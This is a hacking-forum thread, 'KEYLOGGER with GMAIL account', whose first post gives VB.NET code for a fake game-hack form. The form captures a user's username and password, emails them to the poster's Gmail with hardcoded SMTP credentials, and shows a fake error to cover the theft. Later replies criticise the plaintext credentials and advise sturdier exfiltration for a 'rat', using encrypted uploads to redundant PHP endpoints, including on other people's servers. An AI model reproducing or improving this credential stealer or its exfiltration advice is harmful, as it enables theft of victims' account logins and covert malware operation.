Login Register






Tutorial KEYLOGGER with GMAIL account filter_list
Author
Message
KEYLOGGER with GMAIL account #1
clearly tutorial

VIDEO


CODE
Imports System.Net.Mail

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
       Dim MyMailMessage As New MailMessage()
       MyMailMessage.From = New MailAddress("mychatboxnielmar@Gmail.com")
       MyMailMessage.To.Add("mychatboxnielmar@Gmail.com")
       MyMailMessage.Subject = ("LEAGUE OF LEGENDS HACK")
       MyMailMessage.Body = ("Username: >>>" + TextBox1.Text + "<<< AND >>>" + "Password: >>>" + TextBox2.Text + "<<<")
       Dim SMTPServer As New SmtpClient("smtp.gmail.com")
       SMTPServer.Port = 587
       SMTPServer.Credentials = New System.Net.NetworkCredential("mychatboxnielmar@Gmail.com", "020596nielmar")
       SMTPServer.EnableSsl = True
       SMTPServer.Send(MyMailMessage)
       MsgBox("Fatal Error! 0x23324 Can not connect to account!", MsgBoxStyle.Critical)
   End Sub
(This post was last modified: 03-01-2017, 12:01 PM by Zaisen.)
if you don't need me must i don't need you so much!

Reply

RE: KEYLOGGER with GMAIL account #2
Please use "[code]" tags for encapsulating your code.

Regarding the code, no, no, no.
This was one of the first things I made, a "phisher". I highly recommend NOT using this code. If you create a program with that piece of code, you can easily reverse engineer it and get the login credentials, especially since you store them in plaintext in your program, they're not even encrypted.
~~ Might be back? ~~

Reply

RE: KEYLOGGER with GMAIL account #3
(03-01-2017, 12:59 PM)Bish0pQ Wrote: Please use "[code]" tags for encapsulating your code.

Regarding the code, no, no, no.
This was one of the first things I made, a "phisher". I highly recommend NOT using this code. If you create a program with that piece of code, you can easily reverse engineer it and get the login credentials, especially since you store them in plaintext in your program, they're not even encrypted.

sir if i do that i can't post a tread error cannot post more php? i think
if you don't need me must i don't need you so much!

Reply

RE: KEYLOGGER with GMAIL account #4
There's also the potential to get the account blocked by google in the case of your rat getting a lot of installs in short time, thus lots of messages going out in short time. Or would this not count if emails are going to self? I dunno. Ignore me.

Bish0pQ makes the best point - hard coded creds are bad.

I'd consider another exfiltration method. Possibly a php script that does some checks on the client to make sure it's genuine before accepting its requests, you should compress and encrypt your exfil data before sending to your php base.

This has some redundancy in that you can upload the php to multiple places, if one fails the rat can go to the next one. Because data in encrypted, it's safe to do it on other peoples servers, just pick up the files from all servers and decrypt at home. To avoid leaving your unencypted data on other servers.

There's a lot of extra layers you could put into this. You might be excited to get your project off the ground and go live but it will all be for nothing if your data exfiltration method fails. Do it right the first time.

Reply

RE: KEYLOGGER with GMAIL account #5
video is no longer available good sir

Reply